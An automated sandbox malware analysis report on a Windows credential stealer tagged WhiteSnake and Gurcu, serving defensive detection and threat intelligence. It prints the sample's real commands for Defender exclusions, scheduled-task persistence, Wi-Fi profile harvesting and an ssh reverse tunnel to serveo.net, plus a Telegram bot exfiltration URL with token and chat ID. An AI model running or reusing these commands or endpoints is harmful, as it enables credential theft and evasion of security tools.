Windows Analysis Report
jqOHOuPMJP.exe

Overview

General Information

Sample name: jqOHOuPMJP.exe (renamed because original name is a hash value)
Original sample name: 7e9a93c69aecfc2bbda9470fbd4556db.exe
Analysis ID: 1390172
MD5: 7e9a93c69aecfc2bbda9470fbd4556db
SHA1: ab0e810472a897affac1a761b49595939f6897a9
SHA256: 82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
Tags: exe, WhiteSnakeStealer

Detection

Gurcu Stealer, WhiteSnake Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Gurcu Stealer
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • jqOHOuPMJP.exe (PID: 6780 cmdline: C:\Users\user\Desktop\jqOHOuPMJP.exe MD5: 7E9A93C69AECFC2BBDA9470FBD4556DB)
    • powershell.exe (PID: 1516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7216 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • vkefq4cv.oil.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
      • cmd.exe (PID: 7420 cmdline: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7468 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • timeout.exe (PID: 7484 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • schtasks.exe (PID: 7600 cmdline: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • vkefq4cv.oil.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
          • cmd.exe (PID: 7776 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7988 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • netsh.exe (PID: 8008 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • findstr.exe (PID: 8020 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • cmd.exe (PID: 8064 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8116 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • netsh.exe (PID: 8148 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • findstr.exe (PID: 8156 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • ssh.exe (PID: 4548 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
            • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vkefq4cv.oil.exe (PID: 8072 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
    • cmd.exe (PID: 1196 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 2084 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 2004 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 6344 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 6544 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7384 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7316 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7500 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • ssh.exe (PID: 7440 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 1800 cmdline: C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • vkefq4cv.oil.exe (PID: 7712 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 125704 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 325468 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 491576 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • cleanup
{"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Source | Rule | Description | Author
0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GurcuStealer | Yara detected Gurcu Stealer | Joe Security
0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GurcuStealer | Yara detected Gurcu Stealer | Joe Security
00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GurcuStealer | Yara detected Gurcu Stealer | Joe Security

Source | Rule | Description | Author
0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

System Summary

                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, ParentProcessId: 7316, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ProcessId: 7420, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.119.118.59, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Initiated: true, ProcessId: 7620, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, CommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentProcessId: 7620, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, ProcessId: 4548, ProcessName: ssh.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , CommandLine: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7420, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , ProcessId: 7600, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe

Stealing of Sensitive Information

                  Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentProcessId: 7620, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], ProcessId: 7776, ProcessName: cmd.exe
                  No Snort rule has matched

AV Detection

Source: vkefq4cv.oil.exe.8072.18.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}
Source: vkefq4cv.oil.exe.8072.18.memstrmin, Malware Configuration Extractor: Gurcu Stealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}
Source: jqOHOuPMJP.exe, ReversingLabs: Detection: 13%
Source: jqOHOuPMJP.exe, Virustotal: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Joe Sandbox ML: detected
Source: jqOHOuPMJP.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Code function: 11_2_00007FFD9B9784B1 CryptUnprotectData, 11_2_00007FFD9B9784B1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Code function: 11_2_00007FFD9B9785FD CryptUnprotectData, 11_2_00007FFD9B9785FD
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Code function: 18_2_00007FFD9B9784A1 CryptUnprotectData, 18_2_00007FFD9B9784A1
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: jqOHOuPMJP.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 4_2_00007FFD9B9A5133
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 11_2_00007FFD9B974B99
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B981888h | 11_2_00007FFD9B981353
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B98016Dh | 11_2_00007FFD9B97FF54
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B974622h | 11_2_00007FFD9B973E71
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B98B834h | 11_2_00007FFD9B98B67A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 11_2_00007FFD9B973DA8
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B9775FCh | 11_2_00007FFD9B9773F9
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B981FA1h | 11_2_00007FFD9B981A79
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B97D1B7h | 11_2_00007FFD9B97C2B7
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 11_2_00007FFD9B97B97A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B98E899h | 11_2_00007FFD9B98E668
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 11_2_00007FFD9B97F5EF
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B97D1B7h | 11_2_00007FFD9B97CE3C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B9745F6h | 11_2_00007FFD9B974574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B974622h | 11_2_00007FFD9B974574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 18_2_00007FFD9B974B99
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B97D197h | 18_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B97CA9Ch | 18_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B97CC93h | 18_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B980CADh | 18_2_00007FFD9B980A2E
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 18_2_00007FFD9B97B95A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B974622h | 18_2_00007FFD9B973E71
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B98B814h | 18_2_00007FFD9B98B678
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 18_2_00007FFD9B975E3E
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B97EA38h | 18_2_00007FFD9B97E4AE
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B981F81h | 18_2_00007FFD9B981A59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 18_2_00007FFD9B97F85F
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B98E879h | 18_2_00007FFD9B98E7BC
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B97D197h | 18_2_00007FFD9B97CE1C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B9745F6h | 18_2_00007FFD9B974574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B974622h | 18_2_00007FFD9B974574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B97771Ch | 18_2_00007FFD9B977519
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 42_2_00007FFD9B984B99
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 42_2_00007FFD9B986690
